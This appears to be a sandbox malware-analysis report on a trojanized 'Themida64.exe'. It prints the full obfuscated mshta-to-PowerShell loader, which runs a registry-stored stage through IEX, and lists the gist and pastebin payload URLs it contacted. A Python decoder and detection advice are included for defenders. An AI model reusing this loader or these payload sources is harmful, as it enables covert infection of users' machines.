| File name: | Themida64.exe |
| Full analysis: | https://app.any.run/tasks/34bd656a-4dea-48aa-94ea-c19ffa460342 |
| Verdict: | Malicious activity |
| Analysis date: | April 25, 2025, 14:28:06 |
| OS: | Windows 10 Professional (build: 19044, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/vnd.microsoft.portable-executable |
| File info: | PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, 14 sections |
| MD5: | 9AECEB09DA3BF6FE134B6B5C983B7518 |
| SHA1: | 85B8A78D5D0708B23F4B1284A25FFAFF2DC7E845 |
| SHA256: | 174EC49991D44D80ECB95208DA740E3AD67D6EEF340FFD1F66D8446ECA0605D8 |
| SSDEEP: | 393216:1wDx3Hy1LEQKWu5JJs/lwcVlSIU5zrXyBMRNjzmwq:uDx3XJJeJ2IqzrCBMRVq |
| Extension | Type | Score |
|---|---|---|
| .exe | Win32 EXE PECompact compressed (generic) | 53.4 |
| .exe | Win64 Executable (generic) | 35.5 |
| .exe | Win32 Executable (generic) | 5.8 |
| .exe | Generic Win/DOS Executable | 2.5 |
| .exe | DOS Executable Generic | 2.5 |
| Field | Value |
|---|---|
| MachineType | AMD AMD64 |
| TimeStamp | 2024:03:22 20:28:08+00:00 |
| ImageFileCharacteristics | Executable, No line numbers, No symbols, Large address aware, No debug |
| PEType | PE32+ |
| LinkerVersion | 2.42 |
| CodeSize | 8192 |
| InitializedDataSize | 64512 |
| UninitializedDataSize | 512 |
| EntryPoint | 0x10f6 |
| OSVersion | 4 |
| ImageVersion | - |
| SubsystemVersion | 5.2 |
| Subsystem | Windows GUI |
| FileVersionNumber | 3.1.8.0 |
| ProductVersionNumber | 3.1.8.0 |
| FileFlagsMask | 0x003f |
| FileFlags | (none) |
| FileOS | Win32 |
| ObjectFileType | Executable application |
| FileSubtype | - |
| LanguageCode | English (U.S.) |
| CharacterSet | Windows, Latin1 |
| CompanyName | Oreans Technologies |
| FileDescription | Themida - Advanced Windows Software Protection |
| FileVersion | 3.1.8.0 |
| LegalCopyright | Oreans Technologies |
| OriginalFileName | Themida |
| ProductName | Themida |
| ProductVersion | 3.1.8.0 |
| PID | CMD | Path | Indicators | Parent process | User | Integrity level | Exit code | Company; description; version |
|---|---|---|---|---|---|---|---|---|
| 2196 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | | services.exe | NETWORK SERVICE | SYSTEM | | Microsoft Corporation; Host Process for Windows Services; 10.0.19041.1 (WinBuild.160101.0800) |
| 3176 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | admin | MEDIUM | 0 | Microsoft Corporation; Console Window Host; 10.0.19041.1 (WinBuild.160101.0800) |
| 4620 | C:\WINDOWS\System32\slui.exe -Embedding | C:\Windows\System32\slui.exe | | svchost.exe | admin | MEDIUM | 0 | Microsoft Corporation; Windows Activation Client; 10.0.19041.1 (WinBuild.160101.0800) |
| 5892 | C:\Windows\System32\fontdrvhost.exe | C:\Windows\System32\fontdrvhost.exe | — | powershell.exe | admin | MEDIUM | | Microsoft Corporation; Usermode Font Driver Host; 10.0.19041.3996 (WinBuild.160101.0800) |
| 6268 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG([CoNVERT]::fRoMBASE64stRiNg('KFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChncCgoKCJ7M317NH17MH17Mn17MX0iLWYnKmV7MCcsJ20nLCd9UyonLCdIJywnS0xNOnswfVMnKSktRltDSGFSXTkyKSkuY29uZmlnKSkpfEllWA=='))).InVoKe() | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | mshta.exe | admin | MEDIUM | 0 | Microsoft Corporation; Windows PowerShell; 10.0.19041.1 (WinBuild.160101.0800) |
| 7448 | "C:\WINDOWS\system32\MShtA.EXE" vBSCripT:(cReAtEobjECt("wsCrIP"+"T.SHelL").rUn("pOwErshELl [sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG([CoNVERT]::fRoMBASE64stRiNg('KFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKChncCgoKCJ7M317NH17MH17Mn17MX0iLWYnKmV7MCcsJ20nLCd9UyonLCdIJywnS0xNOnswfVMnKSktRltDSGFSXTkyKSkuY29uZmlnKSkpfEllWA=='))).InVoKe()",0))(cLOse) | C:\Windows\System32\mshta.exe | — | svchost.exe | admin | MEDIUM | 0 | Microsoft Corporation; Microsoft (R) HTML Application host; 11.00.19041.1 (WinBuild.160101.0800) |
| 7900 | "C:\Users\admin\Desktop\Themida64.exe" | C:\Users\admin\Desktop\Themida64.exe | — | explorer.exe | admin | MEDIUM | 3221226540 (0xC000042C, STATUS_ELEVATION_REQUIRED) | Oreans Technologies; Themida - Advanced Windows Software Protection; 3.1.8.0 |
| 7988 | "C:\Users\admin\Desktop\Themida64.exe" | C:\Users\admin\Desktop\Themida64.exe | | explorer.exe | admin | HIGH | 0 | Oreans Technologies; Themida - Advanced Windows Software Protection; 3.1.8.0 |
| 8036 | "C:\Users\admin\Desktop\virt.exe" | C:\Users\admin\AppData\Local\Temp\evbD4F7.tmp | — | Themida64.exe | admin | HIGH | 0 | |
| 8116 | "C:\Users\admin\Desktop\Themida-x64.exe" | C:\Users\admin\AppData\Local\Temp\evbD888.tmp | — | Themida64.exe | admin | HIGH | 0 | |

Blank Indicators cells are rows whose indicator icons were not captured; "—" is the report's own marker for no indicators. PID 7900 exits with 0xC000042C while PID 7988 is the same image re-launched at HIGH integrity, i.e. the first start failed for lack of elevation and the second ran elevated. PIDs 8036 and 8116 report a Desktop path on their command line but actually execute from `evb*.tmp` files under `%TEMP%`, so the image name in the command line is not the file on disk.
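The command lines of PID 7448 (mshta.exe) and PID 6268 (powershell.exe) carry the same three-layer loader: a Base64 literal that is turned into a script block and invoked; inside it, a `"{3}{4}{0}{2}{1}" -f ...` format-operator expression that hides a registry path; and a second `-F [CHaR]92` that substitutes the remaining `{0}` placeholders with backslashes. The result is passed to `gp` (the built-in alias for `Get-ItemProperty`), its `config` property is Base64-decoded and piped to `IEX`. The Python below is an added example written for this page, not code from the report or from ANY.RUN; it reproduces those layers offline from the command line exactly as printed above and shows that the path resolves to the wildcard `HKLM:\S*e\S*m` with value name `config`, which matches the `HKEY_LOCAL_MACHINE\SOFTWARE\System` / `Config` write that the registry events below attribute to PID 8140 (a process reported as conhost.exe that does not appear in the process tree as reproduced here). The `Config` data itself is not reproduced on this page, so the example identifies where stage 2 is read from and does not decode it. The `key_matches` helper is the example's own check, not a PowerShell function.

```python
"""Decode the mshta -> powershell loader from the process table above.

Added example for this page, not the report's code. Inputs are the strings
printed in the report; nothing else is assumed.
"""
import base64
import re
from fnmatch import fnmatchcase
from typing import Optional

# Base64 literal copied verbatim from the report's command lines.
PAYLOAD_B64 = (
    "KFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5n"
    "KChncCgoKCJ7M317NH17MH17Mn17MX0iLWYnKmV7MCcsJ20nLCd9UyonLCdIJywnS0xNOnswfVMn"
    "KSktRltDSGFSXTkyKSkuY29uZmlnKSkpfEllWA=="
)

# Command line of PID 7448 (mshta.exe), reassembled from the process table.
MSHTA_CMDLINE = (
    'vBSCripT:(cReAtEobjECt("wsCrIP"+"T.SHelL").rUn("pOwErshELl '
    "[sCRiPTblock]::cReaTe([TeXT.eNCoDing]::UTf8.GeTSTRinG("
    "[CoNVERT]::fRoMBASE64stRiNg('" + PAYLOAD_B64 + "'))).InVoKe()\",0))(cLOse)"
)

# PowerShell is case-insensitive, so every pattern is too.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)", re.IGNORECASE)
FORMAT_RE = re.compile(
    r"""\"(?P<fmt>[^"]*)\"\s*-f\s*(?P<args>(?:'[^']*'\s*,?\s*)+)""", re.IGNORECASE)
CHAR_RE = re.compile(r"-f\s*\[char\]\s*(\d+)", re.IGNORECASE)
IEX_SINK_RE = re.compile(r"\.(\w+)\)+\s*\|\s*iex\b", re.IGNORECASE)


def extract_outer_base64(cmdline: str) -> str:
    """Layer 1: the script block text is a Base64 literal in FromBase64String('...')."""
    m = B64_RE.search(cmdline)
    if not m:
        raise ValueError("no FromBase64String literal in command line")
    return m.group(1)


def decode_stage1(b64: str) -> str:
    """Decode layer 1: the text handed to [ScriptBlock]::Create(...).Invoke()."""
    return base64.b64decode(b64).decode("utf-8")


def resolve_registry_path(stage1: str) -> str:
    """Layers 2 and 3: "fmt" -f 'a','b',...  and then  (...) -f [char]92.

    .NET String.Format and Python str.format share the {n} placeholder syntax
    and neither re-parses braces inside substituted arguments, so the pieces
    '*e{0' and 'KLM:{0}S' survive layer 2 verbatim and only become a path
    when layer 3 replaces {0} with chr(92), a backslash.
    """
    m = FORMAT_RE.search(stage1)
    if not m:
        raise ValueError("no -f format expression found")
    args = re.findall(r"'([^']*)'", m.group("args"))
    path = m.group("fmt").format(*args)
    cm = CHAR_RE.search(stage1, m.end())
    if cm:
        path = path.format(chr(int(cm.group(1))))
    return path


def value_read_and_piped_to_iex(stage1: str) -> Optional[str]:
    """Name of the property read from Get-ItemProperty (gp) and piped to IEX."""
    m = IEX_SINK_RE.search(stage1)
    return m.group(1) if m else None


def key_matches(wildcard_path: str, observed_key: str) -> bool:
    """Does a key from the registry-events table match the wildcard gp path?

    Get-ItemProperty expands * case-insensitively; the HKEY_LOCAL_MACHINE
    hive name is normalised to the HKLM: drive before matching.
    """
    observed = observed_key.replace("HKEY_LOCAL_MACHINE\\", "HKLM:\\")
    return fnmatchcase(observed.lower(), wildcard_path.lower())


def analyse(cmdline: str) -> dict:
    """Run all layers and report where stage 2 is fetched from."""
    stage1 = decode_stage1(extract_outer_base64(cmdline))
    return {
        "stage1": stage1,
        "registry_path": resolve_registry_path(stage1),
        "value_name": value_read_and_piped_to_iex(stage1),
    }


if __name__ == "__main__":
    result = analyse(MSHTA_CMDLINE)
    for name, value in result.items():
        print(f"{name}: {value}")
    # Key written by PID 8140 according to the registry-events table.
    written_key = r"HKEY_LOCAL_MACHINE\SOFTWARE\System"
    print("stage 2 read from", written_key, "->",
          key_matches(result["registry_path"], written_key))
```

The wildcard is what makes the path survive a casual grep for `SOFTWARE\System`: on the host, `Get-ItemProperty HKLM:\S*e\S*m` expands the globs itself, and could in principle match more than one key, so a detection should key on the `-f [char]92` idiom and the `gp ... | IEX` sink rather than on the literal key name.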
| PID | Process | Key | Name | Operation | Value |
|---|---|---|---|---|---|
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\System | Config | write | (value not reproduced on this page) |
| 7448 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix | write | |
| 7448 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | write | Cookie: |
| 7448 | mshta.exe | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | write | Visited: |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | EnableFileTracing | write | 0 |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | EnableAutoFileTracing | write | 0 |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | EnableConsoleTracing | write | 0 |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | FileTracingMask | write | |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | ConsoleTracingMask | write | |
| 8140 | conhost.exe | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\conhost_RASAPI32 | MaxFileSize | write | 1048576 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD80A.tmp | executable | 88B9287B185C1E03835B0CB108CED2CC | FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E |
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD888.tmp | executable | 6DA493226D9BE6C4EC55071A60D8AC57 | 6E169193F666DFE0E9273681D3C80BCC7100F9846A661F515D64D58A58C4DCC9 |
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ocdnk0ep.hyj.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 6268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e3ugtcpu.p4l.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD4B8.tmp | executable | F3013E6657D0C31787002D917174DEF1 | 62CD4EDC6A286FA6AC6689F7ABD6E13D010E6AD7956A87E36E6B0EFBBD0DC39F |
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v45wnrjc.4ka.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD557.tmp | executable | 88B9287B185C1E03835B0CB108CED2CC | FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E |
| 7988 | Themida64.exe | C:\Users\admin\AppData\Local\Temp\evbD77C.tmp | executable | 88B9287B185C1E03835B0CB108CED2CC | FA365BFF2126409A3A17256C7EBAC597EF17B0371FEAB01CDE8742ECA7DE2F7E |
| 6268 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bqgqkpa0.ekr.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
| 8140 | conhost.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x0hzn5g1.x11.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |

The `__PSScriptPolicyTest_*.ps1`/`.psm1` files are the probe scripts PowerShell writes when it initialises its script-execution policy check; their appearance under PID 8140 means that process hosted a PowerShell runtime, even though the report names it conhost.exe.
| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| — | — | GET | 200 | 23.48.23.142:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
| — | — | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
| — | — | GET | 301 | 140.82.121.3:443 | https://gist.github.com/msfcon5ol3/107484d66423cb601f418344cd648f12/raw/d85cef60cdb9e8d0f3cb3546de6ab657f9498ac7/upxz | unknown | — | — | — |
| — | — | GET | 200 | 52.149.20.212:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | — | — | — |
| 4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
| 4212 | SIHClient.exe | GET | 200 | 23.48.23.146:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl | unknown | — | — | whitelisted |
| 4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Signing%20CA%202.1.crl | unknown | — | — | whitelisted |
| — | — | GET | 200 | 20.242.39.171:443 | https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping | unknown | — | — | — |
| 4212 | SIHClient.exe | GET | 200 | 23.48.23.146:80 | http://crl.microsoft.com/pki/crl/products/MicTimStaPCA_2010-07-01.crl | unknown | — | — | whitelisted |
| 4212 | SIHClient.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl | unknown | — | — | whitelisted |
| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| — | — | 20.73.194.208:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
| — | — | 192.168.100.255:137 | — | — | — | whitelisted |
| 4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
| — | — | 23.48.23.142:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
| — | — | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
| 8140 | conhost.exe | 188.114.97.3:443 | maper.info | CLOUDFLARENET | NL | suspicious |
| 8140 | conhost.exe | 188.114.96.3:443 | maper.info | CLOUDFLARENET | NL | suspicious |
| 6268 | powershell.exe | 104.22.68.199:443 | pastebin.com | CLOUDFLARENET | — | whitelisted |
| 6268 | powershell.exe | 140.82.121.3:443 | gist.github.com | GITHUB | US | whitelisted |
| 6268 | powershell.exe | 185.199.110.133:443 | gist.githubusercontent.com | FASTLY | US | shared |
| Domain | IP | Reputation |
|---|---|---|
| settings-win.data.microsoft.com | | whitelisted |
| google.com | | whitelisted |
| crl.microsoft.com | | whitelisted |
| www.microsoft.com | | whitelisted |
| maper.info | | malicious |
| eth0.me | | unknown |
| pastebin.com | | whitelisted |
| gist.github.com | | whitelisted |
| gist.githubusercontent.com | | shared |
| activation-v2.sls.microsoft.com | | whitelisted |

The IP column is empty because the report did not record resolved addresses in this section; the addresses that were observed appear in the connections table above.
| PID | Process | Class | Message |
|---|---|---|---|
| 8140 | conhost.exe | Potential Corporate Privacy Violation | ET INFO IP Logger Redirect Domain in SNI |
| — | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
| 2196 | svchost.exe | Device Retrieving External IP Address Detected | ET INFO External IP Address Lookup Domain (eth0 .me) in DNS Lookup |
| 8140 | conhost.exe | Device Retrieving External IP Address Detected | ET INFO Observed External IP Lookup Domain (eth0 .me) in TLS SNI |
| — | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |
| — | — | Device Retrieving External IP Address Detected | SUSPICIOUS [ANY.RUN] An IP address was received from the server as a result of an HTTP request |
| 2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
| — | — | Potentially Bad Traffic | ET HUNTING GET Request to Pastebin .com with PowerShell User-Agent |
| — | — | Not Suspicious Traffic | ET INFO Windows Powershell User-Agent Usage |